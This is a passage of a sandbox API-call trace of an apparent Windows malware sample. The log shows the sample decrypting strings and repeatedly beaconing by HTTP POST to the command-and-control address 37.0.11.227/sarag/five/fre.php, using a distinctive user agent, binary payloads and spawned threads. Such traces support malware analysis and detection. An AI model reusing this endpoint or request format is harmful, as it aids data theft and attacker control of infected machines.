Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0329.528] GetProcessHeap () returned 0x690000 [0329.528] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0329.528] GetProcessHeap () returned 0x690000 [0329.529] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.529] GetProcessHeap () returned 0x690000 [0329.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0329.529] GetProcessHeap () returned 0x690000 [0329.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0329.530] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.531] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0329.531] GetProcessHeap () returned 0x690000 [0329.531] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0329.531] GetProcessHeap () returned 0x690000 [0329.531] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.531] send (s=0xb88, buf=0x6ad508*, len=242, flags=0) returned 242 [0329.532] send (s=0xb88, buf=0x6aba40*, len=159, flags=0) returned 159 [0329.532] GetProcessHeap () returned 0x690000 [0329.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0329.532] recv (in: s=0xb88, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0329.612] GetProcessHeap () returned 0x690000 [0329.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0329.613] GetProcessHeap () returned 0x690000 [0329.613] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0329.613] GetProcessHeap () returned 0x690000 [0329.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0329.614] GetProcessHeap () returned 0x690000 [0329.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0329.614] closesocket (s=0xb88) returned 0 [0329.615] GetProcessHeap () returned 0x690000 [0329.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0329.615] GetProcessHeap () returned 0x690000 [0329.615] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.616] GetProcessHeap () returned 0x690000 [0329.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0329.616] GetProcessHeap () returned 0x690000 [0329.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0329.617] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18d4) returned 0xb88 [0329.619] Sleep (dwMilliseconds=0xea60) [0329.620] GetProcessHeap () returned 0x690000 [0329.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0329.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0329.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0329.641] GetProcessHeap () returned 0x690000 [0329.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0329.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.648] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0329.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.649] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0329.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.650] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.650] GetProcessHeap () returned 0x690000 [0329.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0329.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.652] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0329.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.653] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0329.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.654] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0329.654] GetProcessHeap () returned 0x690000 [0329.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0329.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.655] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0329.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.656] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0329.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.657] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0329.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.658] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0329.658] GetProcessHeap () returned 0x690000 [0329.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0329.658] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0329.659] GetProcessHeap () returned 0x690000 [0329.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0329.659] GetProcessHeap () returned 0x690000 [0329.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.660] GetProcessHeap () returned 0x690000 [0329.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0329.660] GetProcessHeap () returned 0x690000 [0329.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0329.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.661] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0329.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0329.676] GetProcessHeap () returned 0x690000 [0329.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0329.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.678] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0329.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.679] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0329.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.680] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.680] GetProcessHeap () returned 0x690000 [0329.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0329.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.681] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0329.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.682] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0329.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.684] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0329.684] GetProcessHeap () returned 0x690000 [0329.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0329.685] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.685] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0329.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.686] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0329.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.688] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0329.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.689] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0329.689] GetProcessHeap () returned 0x690000 [0329.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0329.689] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0329.689] GetProcessHeap () returned 0x690000 [0329.689] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0329.689] socket (af=2, type=1, protocol=6) returned 0xb8c [0329.689] connect (s=0xb8c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0329.714] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0329.714] GetProcessHeap () returned 0x690000 [0329.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0329.714] GetProcessHeap () returned 0x690000 [0329.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0329.715] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.723] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0329.723] GetProcessHeap () returned 0x690000 [0329.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0329.724] GetProcessHeap () returned 0x690000 [0329.724] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.724] GetProcessHeap () returned 0x690000 [0329.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0329.724] GetProcessHeap () returned 0x690000 [0329.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0329.725] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.727] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0329.727] GetProcessHeap () returned 0x690000 [0329.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0329.727] GetProcessHeap () returned 0x690000 [0329.727] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.727] send (s=0xb8c, buf=0x6ad508*, len=242, flags=0) returned 242 [0329.729] send (s=0xb8c, buf=0x6aba40*, len=159, flags=0) returned 159 [0329.729] GetProcessHeap () returned 0x690000 [0329.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0329.729] recv (in: s=0xb8c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0329.807] GetProcessHeap () returned 0x690000 [0329.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0329.808] GetProcessHeap () returned 0x690000 [0329.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0329.810] GetProcessHeap () returned 0x690000 [0329.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0329.810] GetProcessHeap () returned 0x690000 [0329.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0329.810] closesocket (s=0xb8c) returned 0 [0329.811] GetProcessHeap () returned 0x690000 [0329.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0329.811] GetProcessHeap () returned 0x690000 [0329.811] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.811] GetProcessHeap () returned 0x690000 [0329.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0329.812] GetProcessHeap () returned 0x690000 [0329.812] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0329.812] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18d8) returned 0xb8c [0329.814] Sleep (dwMilliseconds=0xea60) [0329.815] GetProcessHeap () returned 0x690000 [0329.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0329.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.817] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0329.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0329.833] GetProcessHeap () returned 0x690000 [0329.833] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0329.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.834] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0329.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.835] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0329.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.836] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.836] GetProcessHeap () returned 0x690000 [0329.836] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0329.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.837] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0329.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.838] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0329.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.840] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0329.840] GetProcessHeap () returned 0x690000 [0329.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0329.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.841] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0329.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.842] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0329.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.843] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0329.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.855] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0329.855] GetProcessHeap () returned 0x690000 [0329.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0329.856] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0329.856] GetProcessHeap () returned 0x690000 [0329.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0329.856] GetProcessHeap () returned 0x690000 [0329.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.857] GetProcessHeap () returned 0x690000 [0329.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0329.857] GetProcessHeap () returned 0x690000 [0329.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0329.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.858] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0329.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0329.870] GetProcessHeap () returned 0x690000 [0329.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0329.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.871] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0329.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.872] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0329.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.873] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.873] GetProcessHeap () returned 0x690000 [0329.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0329.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.875] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0329.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.875] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0329.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.876] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0329.876] GetProcessHeap () returned 0x690000 [0329.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0329.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.877] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0329.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.878] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0329.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.879] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0329.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.880] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0329.880] GetProcessHeap () returned 0x690000 [0329.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0329.880] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0329.880] GetProcessHeap () returned 0x690000 [0329.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0329.880] socket (af=2, type=1, protocol=6) returned 0xb90 [0329.881] connect (s=0xb90, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0329.907] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0329.907] GetProcessHeap () returned 0x690000 [0329.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0329.907] GetProcessHeap () returned 0x690000 [0329.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0329.908] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.909] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0329.909] GetProcessHeap () returned 0x690000 [0329.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0329.909] GetProcessHeap () returned 0x690000 [0329.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.909] GetProcessHeap () returned 0x690000 [0329.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0329.909] GetProcessHeap () returned 0x690000 [0329.910] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0329.910] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.911] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0329.911] GetProcessHeap () returned 0x690000 [0329.911] 